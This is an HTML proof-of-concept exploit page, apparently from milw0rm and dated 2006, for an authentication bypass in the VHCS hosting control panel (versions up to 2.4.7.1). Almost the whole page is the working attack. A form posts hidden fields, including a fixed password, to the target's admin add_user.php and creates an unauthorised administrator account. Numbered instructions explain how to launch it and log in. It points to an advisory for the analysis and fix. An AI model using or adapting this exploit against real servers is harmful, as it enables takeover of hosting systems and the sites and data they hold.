VHCS <= 2.4.7.1 (Add User) Authentication Bypass Exploit

&#60;html&#62; &#60;head&#62; &#60;title&#62;VHCS (version &#60;= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt&#60;/title&#62; &#60;script language=&#34;JavaScript&#34;&#62; function submitform() { if (document.admin_add_user.username.value==&#39;admin&#39;) { alert(&#39;Learn to read before launching an exploit, script-kiddie!&#39;); exit(); } document.admin_add_user.action=document.admin_add_user.target.value; document.admin_add_user.submit(); } &#60;/script&#62; &#60;/head&#62; &#60;body&#62; &#60;hr&#62; &#60;center&#62; &#60;b&#62;VHCS (version &#60;= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt &#60roman&#64rs-labs.com&#62 &nbsp;[08.Feb.2006]&#60;/b&#62; &#60;/center&#62; &#60;hr&#62; &#60;form name=&#34;admin_add_user&#34; method=&#34;post&#34; action=&#34;&#34;&#62; &#60;table width=&#34;100%&#34; cellpadding=&#34;5&#34; cellspacing=&#34;5&#34;&#62; &#60;tr&#62; &#60;td width=&#34;20&#34;&#62;&nbsp;&#60;/td&#62; &#60;td colspan=&#34;2&#34;&#62; &nbsp; &#60;/td&#62; &#60;/tr&#62; &#60;tr&#62; &#60;td width=&#34;20&#34;&#62;&nbsp;&#60;/td&#62; &#60;td width=&#34;200&#34;&#62;Target URL&#60;/td&#62; &#60;td&#62; &#60;input type=&#34;text&#34; name=&#34;target&#34; value=&#34;http://&#60;target&#62;/vhcs2/admin/add_user.php&#34; style=&#34;width:400px&#34;&#62; &#60;/td&#62; &#60;/tr&#62; &#60;tr&#62; &#60;td width=&#34;20&#34;&#62;&nbsp;&#60;/td&#62; &#60;td width=&#34;200&#34;&#62;Username&#60;/td&#62; &#60;td&#62; &#60;input type=&#34;text&#34; name=&#34;username&#34; value=&#34;admin&#34; style=&#34;width:200px&#34;&#62;&nbsp;(should NOT exist) &#60;/td&#62; &#60;/tr&#62; &#60;tr&#62; &#60;td&#62;&nbsp;&#60;/td&#62; &#60;td colspan=&#34;2&#34;&#62;&#60;a href=&#34;javascript: submitform()&#34;&#62;Exploit it!&#60;/a&#62;&#60;/td&#62; &#60;/tr&#62; &#60;tr&#62; &#60;td colspan=&#34;3&#34;&#62;&nbsp; &#60;/td&#62; &#60;/tr&#62; &#60;/table&#62; &#60;input type=&#34;hidden&#34; name=&#34;pass&#34; value=&#34;dsrrocks&#34;&#62; &#60;input type=&#34;hidden&#34; name=&#34;pass_rep&#34; value=&#34;dsrrocks&#34;&#62; &#60;input type=&#34;hidden&#34; name=&#34;email&#34; value=&#34;vhcs-exploit@rs-labs.com&#34;&#62; &#60;input type=&#34;hidden&#34; name=&#34;uaction&#34; value=&#34;add_user&#34;&#62; &#60;/form&#62; &#60;hr&#62; &#60;br&#62; &#60;u&#62;Quick instructions&#60;/u&#62;.-&#60;br&#62; &#60;br&#62; 1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.&#60;br&#62; 2.- Remember not to use a probably existing username (such as &#34;admin&#34;).&#60;br&#62; 3.- Launch the exploit. &#60;i&#62;If target system is vulnerable, a new VHCS admin user will be created&#60;/i&#62; ;-)&#60;br&#62; 4.- You will be redirected to VHCS login page. Try to login with your brand new username.&#60;br&#62; 5.- Ummm, I forgot it... The password is: &#60;b&#62;dsrrocks&#60;/b&#62;.&#60;br&#62; &#60;br&#62; &#60;u&#62;More info (analysis, fix, etc)&#60;/u&#62;.-&#60;br&#62; &#60;br&#62; See &#60;a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt&#62;&#60;i&#62;RS-2006-1&#60;/i&#62;&#60;/a&#62;.&#60;br&#62; &#60;br&#62; &#60;hr&#62; &#60;/body&#62; &#60;/html&#62; # milw0rm.com [2006-02-23]